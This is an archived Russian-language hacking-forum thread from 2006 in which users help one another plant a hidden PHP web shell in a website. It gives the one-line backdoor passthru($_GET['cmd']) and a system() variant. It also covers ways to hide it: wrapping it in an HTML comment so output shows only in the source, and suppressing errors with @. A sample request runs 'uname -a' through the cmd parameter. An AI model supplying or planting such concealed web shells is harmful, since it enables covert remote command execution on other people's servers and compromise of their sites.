PDA

Просмотр полной версии : Как незаметно вставить уязвимый код в страницу?


mixas
01.07.2006, 01:11
Требуется вставить код типа
<?passthru($_GET['cmd']);?>
Только чтобы на странице не высвечивалось сообщение о пустой команде.
Подскажите как лучше реализовать, можно ли например чтобы сообщение появлялось цветом фона.

hidden
01.07.2006, 01:20
А что насчёт
<!--<?passthru($_GET['cmd'])?>-->

mixas
01.07.2006, 01:32
Не хочет выполнять команды.

hidden
01.07.2006, 01:33
А ты в сорцах смотрел?

c411k
01.07.2006, 01:56
как ты используешь ее?
вставляешь, например, в index.php <?passthru($_GET['cmd']);?>. потом пиши http://yopta.tvoy/index.php?cmd=uname -a и все должно работать..

hidden <!-- ... --> зачем брать в комменты?

hidden
01.07.2006, 02:03
Он сказал, что у него на странице выдаётся сообщение о пустой команде, я сделал чтоб, результат был только в сорцах.

Ch3ck
01.07.2006, 02:34
Вобще-то молодые люди, существует символ @ чтоб в браузер не выводилось никаких ошибок..... например
@system($_GET['cmd']); вот и всё!!! :)Куда проще то?